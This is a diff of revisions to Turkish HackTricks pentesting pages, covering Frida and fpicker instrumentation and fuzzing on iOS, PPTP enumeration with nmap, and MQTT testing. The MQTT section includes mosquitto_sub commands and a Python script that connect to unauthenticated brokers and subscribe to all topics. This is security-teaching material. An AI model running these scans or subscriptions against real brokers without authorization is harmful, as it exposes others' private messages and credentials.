<summary><strong>AWS hackleme becerilerinizi sıfırdan kahramana dönüştürün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>ile</strong>!</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) takip edin.
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
- **Yerel Kütüpheleri Hata Ayıklama:**
- [JEB Decompiler Kullanarak Android Yerel Kütüpheleri Hata Ayıklama](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)

View file

@ -2,21 +2,35 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Frida Kurulumu
**Bir Jailbreak yapılmış cihaza Frida'yı yüklemek için adımlar:**
**Bir Jailbreak cihazına Frida'yı yüklemek için adımlar:**
1. Cydia/Sileo uygulamasınıın.
2. Yönet -> Kaynaklar -> Düzenle -> Ekle'ye gidin.
@ -26,16 +40,16 @@ HackTricks'ı desteklemenin diğer yolları:
**Corellium** kullanıyorsanız, Frida sürümünü [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) adresinden indirmeniz gerekecek (`frida-gadget-[sürümünüz]-ios-universal.dylib.gz`) ve Frida'nın istediği dylib konumuna açıp kopyalamanız gerekecek, örneğin: `/Users/[kullanıcıadınız]/.cache/frida/gadget-ios.dylib`
Kurulduktan sonra, bilgisayarınızda **`frida-ls-devices`** komutunu kullanarak cihazın göründüğünü kontrol edebilirsiniz (bilgisayarınızın buna erişebilmesi gerekir).\
Ayrıca **`frida-ps -Uia`** komutunu da çalıştırarak telefonun çalışan işlemlerini kontrol edebilirsiniz.
Kurulduktan sonra, bilgisayarınızda **`frida-ls-devices`** komutunu kullanarak cihazın görünüp görünmediğini kontrol edebilirsiniz (bilgisayarınızın buna erişebilmesi gerekir).\
Ayrıca telefonun çalışan işlemlerini kontrol etmek için **`frida-ps -Uia`** komutunu da çalıştırın.
## Jailbreak yapılmamış cihaz ve uygulamayı yamalamadan Frida
## Jailbreak yapılmamış cihazda ve uygulamayı yamalamadan Frida
Jailbreak yapılmamış cihazlarda uygulamayı yamalamadan Frida'nın nasıl kullanılacağı hakkında bu blog yazısına bakın: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
Jailbreak yapılmamış cihazlarda uygulamayı yamalamadan Frida'nın nasıl kullanılacağı hakkında bu blog yazısına göz atın: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
## Frida İstemci Kurulumu
**frida araçlarını** yükleyin:
**Frida araçlarını yükleyin:**
```bash
pip install frida-tools
pip install frida
@ -153,9 +167,9 @@ console.log("loaded");
### Frida Stalker
[Belgelerden](https://frida.re/docs/stalker/): Stalker, Frida'nın kod **izleme motoru**dur. İzin verir ki **iş parçacıkları takip edilsin**, her fonksiyon, her blok hatta her bir işlem **yakalansın**.
[Belgelerden](https://frida.re/docs/stalker/): Stalker, Frida'nın kod **izleme motoru**dur. İş parçacıklarının **takip edilmesine** izin verir, her fonksiyonu, her bloğu hatta her yürütülen talimatı **yakalar**.
Frida Stalker'ı uygulayan bir örnek [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
Frida Stalker'ı uygulayan bir örnek için [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
Her bir fonksiyon çağrıldığında Frida Stalker'ın eklenmesi için başka bir örnek:
```javascript
@ -191,7 +205,7 @@ Stalker.flush(); // this is important to get all events
});
```
{% hint style="danger" %}
Bu, hata ayıklama amaçları için ilginç olsa da, sürekli olarak **`.follow()`** ve **`.unfollow()`** yapmak çok verimsizdir.
Bu, hata ayıklama amaçları için ilginç olsa da, sürekli olarak **`.follow()`** ve **`.unfollow()`** yapmak, fuzzing için çok verimsizdir.
{% endhint %}
## [Fpicker](https://github.com/ttdennis/fpicker)
@ -309,20 +323,20 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
Bu durumda her payload'dan sonra uygulamayı yeniden başlatmıyor veya durumu geri yükleme işlemi yapmıyoruz. Dolayısıyla, eğer Frida bir **çökme** bulursa, o payload'dan sonraki **sonraki girişler** uygulamayı **çökertebilir** (çünkü uygulama kararsız bir durumda) hatta girişin uygulamayı **çökertmemesi gerekiyorsa** bile.
Bu durumda her bir payload sonrasında uygulamayı yeniden başlatmıyor veya durumu geri yükleme yapmıyoruz. Dolayısıyla, eğer Frida bir **çöküş** bulursa, o payload'dan sonraki **girişler** de uygulamayı **çökerte bilir** (çünkü uygulama kararsız bir durumda) hatta girişin uygulamayı **çökertmemesi gerekiyorsa** bile.
Ayrıca, Frida iOS'un istisna sinyallerine kancalandığı için, eğer **Frida bir çökme bulursa**, muhtemelen bir **iOS çökme raporu oluşturulmayacak**.
Ayrıca, Frida iOS'un istisna sinyallerine kancalandığından, **Frida bir çöküş bulduğunda**, muhtemelen bir **iOS çöküş raporu oluşturulmayacak**.
Bunu önlemek için örneğin, her Frida çökmesinden sonra uygulamayı yeniden başlatabiliriz.
Bunu önlemek için örneğin, her Frida çöküşünden sonra uygulamayı yeniden başlatabiliriz.
{% endhint %}
### Günlükler ve Çökmeler
**macOS konsolunu** veya **`log`** komut satırını kullanarak macOS günlüklerini kontrol edebilirsiniz.\
iOS'tan gelen günlükleri kontrol etmek için **`idevicesyslog`** kullanabilirsiniz.\
Bazı günlükler, bilgileri **`<private>`** ekleyerek gizleyebilir. Tüm bilgileri görmek için [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) adresinden bazı profilleri yükleyerek bu özel bilgileri etkinleştirmeniz gerekmektedir.
Bazı günlükler, bilgi ekleyerek **`<private>`** ekleyebilir. Tüm bilgileri göstermek için [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) adresinden bazı profilleri yükleyerek bu özel bilgileri etkinleştirmeniz gerekmektedir.
Ne yapmanız gerektiğini bilmiyorsanız:
Ne yapacağınızı bilmiyorsanız:
```sh
vim /Library/Preferences/Logging/com.apple.system.logging.plist
<?xml version="1.0" encoding="UTF-8"?>
@ -344,7 +358,7 @@ killall -9 logd
* `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS yalnızca aynı uygulamanın 25 çöküşünü saklar, bu yüzden bunları temizlemeniz gerekmektedir ya da iOS çöküş oluşturmayı durduracaktır.
iOS yalnızca aynı uygulamanın 25 çöküşünü saklar, bu yüzden bunları temizlemeniz gerekmektedir; aksi takdirde iOS çöküş oluşturmayı durduracaktır.
{% endhint %}
## Frida Android Öğreticileri
@ -357,16 +371,30 @@ iOS yalnızca aynı uygulamanın 25 çöküşünü saklar, bu yüzden bunları t
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,29 +2,43 @@
<details>
<summary><strong>AWS hackleme hakkında sıfırdan kahraman olun</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
**Point-to-Point Tunneling Protocol (PPTP)**, **mobil cihazlara uzaktan erişim** için yaygın olarak kullanılan bir yöntemdir. Anahtar değişimi için **TCP port 1723** kullanırken, verilerin şifrelenmesi için **IP protokolü 47** (Generic Routing Encapsulation veya **GRE**) kullanılır. Bu yapı, internet üzerinden güvenli bir iletişim kanalı kurmak için önemlidir ve alışveriş yapılan verilerin yetkisiz erişimden korunarak gizli kalmasını sağlar.
**Noktadan Noktaya Tünel Protokolü (PPTP)**, mobil cihazlara **uzaktan erişim** için yaygın olarak kullanılan bir yöntemdir. Anahtarların değiş tokuşu için **TCP port 1723**'ü kullanırken, veriler arasında iletilen **IP protokolü 47** (Generic Routing Encapsulation veya **GRE**), verilerin şifrelenmesi için kullanılır. Bu kurulum, internet üzerinden güvenli bir iletişim kanalı kurmak için hayati öneme sahiptir, böylece değiş tokuş edilen verilerin gizli kalmasını ve yetkisiz erişimden korunmasını sağlar.
**Varsayılan Port**: 1723
**Varsayılan Port**:1723
## Numaralandırma
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp)
### [Kaba Kuvvet](../generic-methodologies-and-resources/brute-force.md#pptp)
## Zayıflıklar
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
@ -32,14 +46,14 @@ nmap Pn -sSV -p1723 <IP>
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) ile
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,30 +2,44 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
- **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
**MQ Telemetry Transport (MQTT)**, aşırı basitlik ve hafiflik açısından öne çıkan bir **yayın/abone mesajlaşma protokolü** olarak bilinir. Bu protokol özellikle, cihazların sınırlı kapasitelere sahip olduğu ve düşük bant genişliği, yüksek gecikme süresi veya güvenilir olmayan bağlantılarla karakterize edilen ağlarda çalıştığı ortamlar için özel olarak tasarlanmıştır. MQTT'nin temel hedefleri arasında ağ bant genişliğinin kullanımını en aza indirgeme ve cihaz kaynaklarına olan talebi azaltma yer alır. Ayrıca, güvenilir iletişimi sürdürmeyi ve belirli bir teslimat güvencesi düzeyi sağlamayı amaçlar. Bu hedefler, MQTT'yi **makine-makine (M2M) iletişimi** ve **Nesnelerin İnterneti (IoT)** alanı için son derece uygun hale getirir, burada birçok cihazın verimli bir şekilde bağlanması esastır. Ayrıca, MQTT, bant genişliğini ve pil ömrünü korumanın önemli olduğu mobil uygulamalar için son derece faydalıdır.
**MQ Telemetri Taşıma Protokolü (MQTT)**, aşırı basitlik ve hafifliği ile öne çıkan bir **yayın/abone mesajlaşma protokolü** olarak bilinir. Bu protokol, cihazların sınırlı yeteneklere sahip olduğu ve düşük bant genişliği, yüksek gecikme süresi veya güvenilmez bağlantılarla karakterize edilen ağlar üzerinde çalıştığı ortamlar için özel olarak tasarlanmıştır. MQTT'nin temel amaçları arasında ağ bant genişliğinin kullanımını en aza indirgeme ve cihaz kaynaklarına olan talebi azaltma yer alır. Ayrıca, güvenilir iletişimi sürdürmeyi ve belirli bir teslimat güvencesi düzeyi sağlamayı amaçlar. Bu hedefler, MQTT'yi **makine-makine (M2M) iletişimi** ve **Nesnelerin İnterneti (IoT)** alanı için son derece uygun hale getirir, burada birçok cihazın verimli bir şekilde bağlanması esastır. Ayrıca, MQTT, bant genişliğini ve pil ömrünü korumanın önemli olduğu mobil uygulamalar için son derece faydalıdır.
**Varsayılan port:** 1883
```
PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
## Trafik İnceleniyor
## Trafik İncelenmesi
MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNACK** paketi geri gönderilir. Bu paket, bağlantı durumunu anlamak için önemli olan bir dönüş kodu içerir. **0x00** dönüş kodu, kimlik bilgilerinin kabul edildiğini ve başarılı bir bağlantıyı gösterir. Öte yandan, **0x05** dönüş kodu, kimlik bilgilerinin geçersiz olduğunu ve dolayısıyla bağlantının engellendiğini belirtir.
MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNACK** paketi geri gönderilir. Bu paket, bağlantı durumunu anlamak için hayati öneme sahip olan bir dönüş kodunu içerir. **0x00** dönüş kodu, kimlik bilgilerinin kabul edildiğini ve başarılı bir bağlantıyı gösterir. Öte yandan, **0x05** dönüş kodu, kimlik bilgilerinin geçersiz olduğunu belirterek bağlantıyı engeller.
Örneğin, broker, geçersiz kimlik bilgileri nedeniyle bağlantıyı reddederse, senaryo şöyle görünecektir:
```
@ -40,9 +54,9 @@ MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNA
## MQTT Pentesting
**Kimlik doğrulama tamamen isteğe bağlıdır** ve hatta kimlik doğrulaması yapılıyorsa **varsayılan olarak şifreleme kullanılmaz** (kimlik bilgileri düz metin olarak gönderilir). MITM saldırıları hala gerçekleştirilerek şifreler çalınabilir.
**Kimlik doğrulama tamamen isteğe bağlıdır** ve hatta kimlik doğrulaması yapılıyorsa bile, **varsayılan olarak şifreleme kullanılmaz** (kimlik bilgileri düz metin olarak gönderilir). MITM saldırıları hala gerçekleştirilerek şifreler çalınabilir.
MQTT hizmetine bağlanmak için şu adımları kullanabilirsiniz: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) ve tüm konulara kendinizi abone yapabilirsiniz:
MQTT hizmetine bağlanmak için şunu kullanabilirsiniz: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) ve kendinizi tüm konulara abone yapabilirsiniz:
```
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
> subscribe "#" 1
@ -54,7 +68,7 @@ apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
Ya da bu kodu çalıştırabilirsiniz **kimlik doğrulaması olmadan bir MQTT servisine bağlanmayı denemek için, her konuya abone olabilir ve onları dinleyebilirsiniz**:
Ya da bu kodu çalıştırabilirsiniz **kimlik doğrulaması olmadan bir MQTT servisine bağlanmayı denemek, her konuya abone olmak ve onları dinlemek için**:
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -83,7 +97,7 @@ client.loop_start()
if __name__ == "__main__":
main()
```
## Daha Fazla Bilgi
## Daha fazla bilgi
buradan: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
@ -94,7 +108,7 @@ Yayın/abone olma modeli şunlardan oluşur:
- **Yayıncı**: bir mesajı broker'daki bir veya birden fazla konuya yayınlar.
- **Abone**: broker'daki bir veya birden fazla konuya abone olur ve yayıncıdan gönderilen tüm mesajları alır.
- **Broker**: yayıncılardan gelen tüm mesajları abonelere yönlendirir.
- **Konu**: bir veya daha fazla seviyeden oluşur ve bir ileri eğik çizgi ile ayrılır (örneğin, /smartshouse/livingroom/temperature).
- **Konu**: bir veya daha fazla seviyeden oluşur ve bir ileri eğik çizgi ile ayrılır (örneğin, /akıllıev/salon/sıcaklık).
### Paket Formatı <a href="#f15a" id="f15a"></a>
@ -104,36 +118,48 @@ Her MQTT paketi sabit bir başlık içerir (Şekil 02). Şekil 02: Sabit Başlı
### Paket Türleri
- CONNECT (1): İstemci tarafından sunucuya bağlantı istemek için başlatılır.
- CONNECT (1): Sunucuya bağlantı istemek için istemci tarafından başlatılır.
- CONNACK (2): Başarılı bir bağlantının sunucu tarafından onaylanması.
- PUBLISH (3): İstemciden sunucuya veya tersine bir mesaj göndermek için kullanılır.
- PUBLISH (3): Bir mesajı istemciden sunucuya veya tersine göndermek için kullanılır.
- PUBACK (4): Bir PUBLISH paketinin onaylanması.
- PUBREC (5): Mesajın alındığından emin olmak için bir iletişim protokolünün parçası.
- PUBREL (6): Mesaj iletiminde daha fazla güvence sağlayarak bir mesajın serbest bırakılmasını gösterir.
- PUBCOMP (7): İletişim protokolünün final kısmı, tamamlamayı gösterir.
- SUBSCRIBE (8): Bir istemcinin bir konudan mesajları dinlemek için isteği.
- PUBREC (5): Mesajın alındığından emin olmak için bir iletişim teslimat protokolünün parçası.
- PUBREL (6): Mesaj teslimatında daha fazla güvence sağlayarak bir mesajın serbest bırakılmasını gösterir.
- PUBCOMP (7): Tamamlanmayı gösteren mesaj teslimat protokolünün final kısmı.
